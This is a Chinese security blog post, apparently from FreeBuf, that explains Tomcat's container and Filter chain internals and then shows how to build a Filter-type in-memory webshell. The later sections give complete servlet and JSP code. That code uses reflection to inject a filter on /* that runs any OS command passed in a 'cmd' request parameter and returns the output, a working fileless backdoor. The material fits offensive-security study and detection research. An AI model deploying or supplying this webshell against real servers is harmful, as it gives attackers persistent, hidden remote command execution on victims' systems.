freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Java Filter型 Tomcat内存马
2024-09-23 14:27:39

参考文章:

https://www.cnblogs.com/nice0e3/p/14622879.html

https://blog.csdn.net/xlgen157387/article/details/79006434

Java Filter型内存马的学习与实践 - zpchcbd - 博客园 (cnblogs.com)

手搓Filter内存马从构造到利用讲解(内存马系列篇一) - FreeBuf网络安全行业门户

一 Tomcat架构

想要了解Tomcat的内存马的实现,必须要了解tomcat整体结构与对消息的处理机制

这是tomcat的顶层结构图

1727055083_66f0c4ebd8c3c875198d6.png!small

  1. Server组件:Server是最顶级的组件,代表Tomcat运行的实例,在一个JVM中只会包含一个Server。
  2. Service组件:一个Server组件下可以包含多个Service组件,每个Service组件包含多个接收消息的Connector组件和处理请求的Engine组件。其中,不同的Connector组件使用不同的通信协议,如HTTP协议和AJP协议。
  3. Connector:Tomcat有两个典型的Connector,一个直接侦听来自browser的http请求,一个侦听来自其它WebServer的请求Coyote Http/1.1 Connector 在端口8080处侦听来自客户browser的http请求
    Coyote JK2 Connector 在端口8009处侦听来自其它WebServer(Apache)的servlet/jsp代理请求。

  4. Engine:Engine下可以配置多个虚拟主机,每个虚拟主机都有一个域名当Engine获得一个请求时,它把该请求匹配到某个Host上,然后把该请求交给该Host来处理Engine有一个默认虚拟主机,当请求无法匹配到任何一个Host上的时候,将交给该默认Host来处理。
  5. Context:一个Context对应于一个Web Application,一个WebApplication由一个或者多个Servlet组成。

1727055748_66f0c784e243d6fddcb94.png!small

对于以上我们可以了解到,当一个请求到达tomcat,首先service会交给Connector,Connector用于接收请求并将接收的请求封装为Request和Response来具体处理,Request和Response封装完之后再交由Container进行处理,Container处理完请求之后再返回给Connector,最后在由Connector通过Socket将处理的结果返回给客户端。

而对于Container是如何处理Request和Response的呢,在Connector内部包含了4个子容器,结构图如下:

1727056392_66f0ca08352f415610863.png!small

处理流程:

1727056647_66f0cb076e9e4ff5c343c.png!small

  1. Connector在接收到请求后会首先调用最顶层容器的Pipeline来处理,这里的最顶层容器的Pipeline就是EnginePipeline
  2. 在Engine的管道中依次会执行EngineValve1、EngineValve2等等,最后会执行StandardEngineValve,在StandardEngineValve中会调用Host管道,然后再依次执行Host的HostValve1、HostValve2等,最后在执行StandardHostValve,然后再依次调用Context的管道和Wrapper的管道,最后执行到StandardWrapperValve

  3. 当执行到StandardWrapperValve的时候,会在StandardWrapperValve中创建FilterChain,并调用其doFilter方法来处理请求,这个FilterChain包含着我们配置的与请求相匹配的Filter和Servlet,其doFilter方法会依次调用所有的Filter的doFilter方法和Servlet的service方法,这样请求就得到了处理

最终流程如下:

1727056891_66f0cbfbbbe8622ca6aed.png!small

Server :
- Service 
-- Connector: 客户端接收请求
--- ProtocolHandler: 管理其他工作组件实现对请求的处理
---- Endpoint: 负责接受,处理socket网络连接
---- Processor: 负责将从Endpoint接受的socket连接根据协议类型封装成request
---- Adapter: 负责将封装好的Request交给Container进行处理,解析为可供Container调用的继承了		      ServletRequest接口、ServletResponse接口的对象。
--- Container: 负责封装和管理Servlet 处理用户的servlet请求,并返回对象给web用户的模块
-- Engine:处理接收进来的请求
--- Host: 虚拟主机
--- Host: 虚拟主机
--- Host: 虚拟主机
--- Context: 相当于一个web应用
--- Context:相当于一个web应用
--- Context:相当于一个web应用

二 Filter

1 Filter Demo

可以在上述流程中看到当经过完Wrapper-Pipeline后数据经过 FilterChain,而对于filterchain的的概念

在一个 Web 应用程序中可以注册多个 Filter 程序,每个 Filter 程序都可以针对某一个 URL 进行拦截。如果多个 Filter 程序都对同一个 URL 进行拦截,那么这些 Filter 就会组成一个Filter 链

这个就比较熟悉了,web开发中我们经常构造我们的filter,只有当经过filter后,request才能继续到达servlet

当然,现在我们先完成一个简单的servlet和filter应用,方便接下来的调试

filter:

public class filterDemo implements Filter {

        @Override
        public void init(FilterConfig filterConfig) throws ServletException {
                Filter.super.init(filterConfig);
                System.out.println("Filter init");
        }

        @Override
        public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
                servletRequest.setCharacterEncoding("utf-8");
                servletResponse.setCharacterEncoding("utf-8");
                System.out.println("Filter doFilter");
                filterChain.doFilter(servletRequest, servletResponse);
                System.out.println("Filter endFilter");
        }

        @Override
        public void destroy() {
                Filter.super.destroy();
        }
}

servlet:

public class webDemo extends HttpServlet {
        public void doGet(HttpServletRequest req, HttpServletResponse res) throws IOException {
                System.out.println("doGet");
                res.getWriter().print("doGet");
        }
        public void doPost(HttpServletRequest req, HttpServletResponse res) throws IOException {
                doGet(req, res);
        }
}

web.xml:

<filter>
    <filter-name>filter</filter-name>
    <filter-class>filterDemo</filter-class>
  </filter>
  <filter-mapping>
    <filter-name>filter</filter-name>
    <url-pattern>/demo</url-pattern>
  </filter-mapping>

  <servlet>
    <servlet-name>webdemo</servlet-name>
    <servlet-class>webDemo</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>webdemo</servlet-name>
    <url-pattern>/demo</url-pattern>
  </servlet-mapping>

1727059556_66f0d664be70f6c7966a5.png!small

2 ServletContext

ServletContext是Servlet规范中的一个对象,它代表了当前Web应用程序的上下文(Context)。这个上下文包括了整个Web应用程序的信息,可以被Web应用中的所有Servlet共享。可以将ServletContext看作是一个全局存储区,用于存储和访问Web应用中的全局数据和资源。

获取ServletContext的两种方法

getServletContext();
getServletConfig().getServletContext();

但是当打印 getServletContext().getClass().getName() 时

1727060199_66f0d8e745116a2ce34b1.png!small?1727060198381

获取到的是ApplicationContextFacade这个对象,说明 ServletContext 其实还是 ApplicationContextFacade对象

3 StandardContext

StandardContext就是一个Container,它主要负责对进入的用户请求进行处理。实际来说,不是由它来进行处理,而是交给内部的valve处理。
一个context表示了一个外部应用,它包含多个wrapper,每个wrapper表示一个servlet定义。


三 Filter链分析

如果为了创建一个filter内存马,必须知道filter是如何被创建的,现在尝试找到其中的位置

首先通过调用堆栈可以看到执行的ApplicationFilterChain对象中的internalDoFilter方法和dofilter方法

1727063869_66f0e73d5364583bd051d.png!small?1727063868676

首先是ApplicationFilterChain dofilter调用了 internalDoFilter,然后 internalDoFilter 方法中获取了filterDemo

1727064373_66f0e935ad3178008d62a.png!small?1727064373062

然后调用了filterDemo的dofilter方法

1727064487_66f0e9a7aa419ef920fb0.png!small?1727064487074

也就是我们的filterDemo被 ApplicationFilterChain中internalDoFilter加载并且调用,继续查看ApplicationFilterChain对象的来源。

通过堆栈可以看到tandardWrapperValve对ApplicationFilterChain进行了实例化并且调用了ApplicationFilterChain的dofilter

1727064846_66f0eb0e80497ad33516e.png!small?1727064845615

StandardWrapperValve中通过 createFilterChain创建了一个过滤链,将request, wrapper, servlet 进行传递

1727064916_66f0eb5481c2e0b7cccb8.png!small?1727064916169

跟入createFilterChain进行查看,这个方法获取到了 StandardContext 对象,通过 findFilterMaps 获取到context中所有的filter,将filter放入filterMaps数组,当前存在两个filter,第一个为我们的filterDemo,第二个是tomcat默认的

1727065577_66f0ede9168c57f6b7050.png!small?1727065576514

继续往下调用,遍历每个filterMap中的对象,然后通过matchFiltersURL匹配url的映射关系,匹配通过后,将filter的相关信息存入filterConfig,然后在经过filterChain.addFilter(filterConfig)将filterConfig存至filterChain,即之后调用的ApplicationFilterChain

1727066139_66f0f01ba374fa17ce542.png!small?1727066138771

现在可以发现,ApplicationFilterChain所做的是调用其内部的filter,而filter创建时又是通过addFilter(filterConfig),所以我们需要的就是获取到当前的ApplicationFilterChain,并且修改filterConfig。查看filterConfig结构,该对象有三个重要的属性,一个是ServletContext,一个是filter,一个是filterDef。

1727067135_66f0f3ff4e4d7344032b6.png!small?1727067134342

所需要做的事情:

1、获取当前应用的 StandardContext 对象

2、再获取filterConfigs

2、接着实现自定义想要注入的filter对象

4、然后为自定义对象的filter创建一个FilterDef

5、获取FilterMap并且设置拦截路径,并调用addFilterMapBefore将FilterMap添加

6、最后把 StandardContext 对象 filter对象 FilterDef全部都设置到 filterConfig ,在filterConfigs中添加 filterConfig

四 filter内存马实现

这里参考大佬文章

手搓Filter内存马从构造到利用讲解(内存马系列篇一) - FreeBuf网络安全行业门户

1 Servlet实现

public class AddTomcatFilter extends HttpServlet {

@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
this.doPost(req, resp);
}

@Override
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
try {
String name = "cmdFilter";
//从request中获取ServletContext
ServletContext servletContext = req.getSession().getServletContext();

//从context中获取ApplicationContext对象
Field appctx = servletContext.getClass().getDeclaredField("context");
appctx.setAccessible(true);
ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);

//从ApplicationContext中获取StandardContext对象
Field stdctx = applicationContext.getClass().getDeclaredField("context");
stdctx.setAccessible(true);
StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);

//从StandardContext中获得filterConfigs这个map对象
Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
Configs.setAccessible(true);
Map filterConfigs = (Map) Configs.get(standardContext);

//如果这个过滤器名字没有注册过
if (filterConfigs.get(name) == null) {
//自定义一个Filter对象
Filter filter = new Filter() {
@Override
public void init(FilterConfig filterConfig) throws ServletException {

}

@Override
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
HttpServletRequest req = (HttpServletRequest) servletRequest;
if (req.getParameter("cmd") != null) {
PrintWriter writer = resp.getWriter();
String cmd = req.getParameter("cmd");
String[] commands = new String[3];
String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
commands[0] = "cmd";
commands[1] = "/c";
} else {
commands[0] = "/bin/sh";
commands[1] = "-c";
}
commands[2] = cmd;
try {
writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(),charsetName).useDelimiter("\\A").next());
writer.getClass().getDeclaredMethod("flush").invoke(writer);
writer.getClass().getDeclaredMethod("close").invoke(writer);
return;
} catch (NoSuchMethodException | IllegalAccessException |
InvocationTargetException e) {
e.printStackTrace();
}

}
filterChain.doFilter(servletRequest, servletResponse);
}

@Override
public void destroy() {

}

};

//创建FilterDef对象 并添加 filter对象,filtername, filter类
FilterDef filterDef = new FilterDef();
filterDef.setFilter(filter);
filterDef.setFilterName(name);
filterDef.setFilterClass(filter.getClass().getName());
//通过addFilterDef方法添加 filterDef 方法
standardContext.addFilterDef(filterDef);

//创建FilterMap对象,并添加 filter映射,filtername
FilterMap filterMap = new FilterMap();
filterMap.addURLPattern("/*");
filterMap.setFilterName(name);
//这个不要忘记了
filterMap.setDispatcher(DispatcherType.REQUEST.name());

//通过addFilterMapBefore方法添加filterMap对象
standardContext.addFilterMapBefore(filterMap);

//通过前面获取的filtermaps的put方法放入filterConfig
Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
constructor.setAccessible(true);
ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);

filterConfigs.put(name, filterConfig);

PrintWriter out = resp.getWriter();
out.print("Inject Success !");
}

} catch (Exception e) {
e.printStackTrace();
}

}
}

1727070966_66f102f6e6c5c19f0a530.png!small?1727070965986


1727071000_66f10318651768b657410.png!small?1727070999453


1727071131_66f1039bd4b693e4d01d2.png!small?1727071130946

2 jsp实现

处理逻辑大致相同

<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.util.Map" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>

<%
    final String name = "evil";
    ServletContext servletContext = request.getSession().getServletContext();

    Field appctx = servletContext.getClass().getDeclaredField("context");
    appctx.setAccessible(true);
    ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);

    Field stdctx = applicationContext.getClass().getDeclaredField("context");
    stdctx.setAccessible(true);
    StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);

    Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
    Configs.setAccessible(true);
    Map filterConfigs = (Map) Configs.get(standardContext);

    if (filterConfigs.get(name) == null){
        Filter filter = new Filter() {
            @Override
            public void init(FilterConfig filterConfig) throws ServletException {

            }

            @Override
            public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
                System.out.println("Do Filter ......");
                String cmd;
                if ((cmd = servletRequest.getParameter("cmd")) != null) {
                    Process process = Runtime.getRuntime().exec(cmd);
                    java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
                            new java.io.InputStreamReader(process.getInputStream()));
                    StringBuilder stringBuilder = new StringBuilder();
                    String line;
                    while ((line = bufferedReader.readLine()) != null) {
                        stringBuilder.append(line + '\n');
                    }
                    servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
                    servletResponse.getOutputStream().flush();
                    servletResponse.getOutputStream().close();
                    return;
                }

                filterChain.doFilter(servletRequest,servletResponse);
                System.out.println("doFilter");
            }

            @Override
            public void destroy() {

            }

        };
        
        FilterDef filterDef = new FilterDef();
        filterDef.setFilter(filter);
        filterDef.setFilterName(name);
        filterDef.setFilterClass(filter.getClass().getName());
        /**
         * 将filterDef添加到filterDefs中
         */
        standardContext.addFilterDef(filterDef);

        FilterMap filterMap = new FilterMap();
        filterMap.addURLPattern("/*");
        filterMap.setFilterName(name);
        filterMap.setDispatcher(DispatcherType.REQUEST.name());

        standardContext.addFilterMapBefore(filterMap);

        Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
        constructor.setAccessible(true);
        ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);

        filterConfigs.put(name,filterConfig);
    }
%>
# 网络安全 # web安全 # 漏洞分析 # 网络安全技术
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录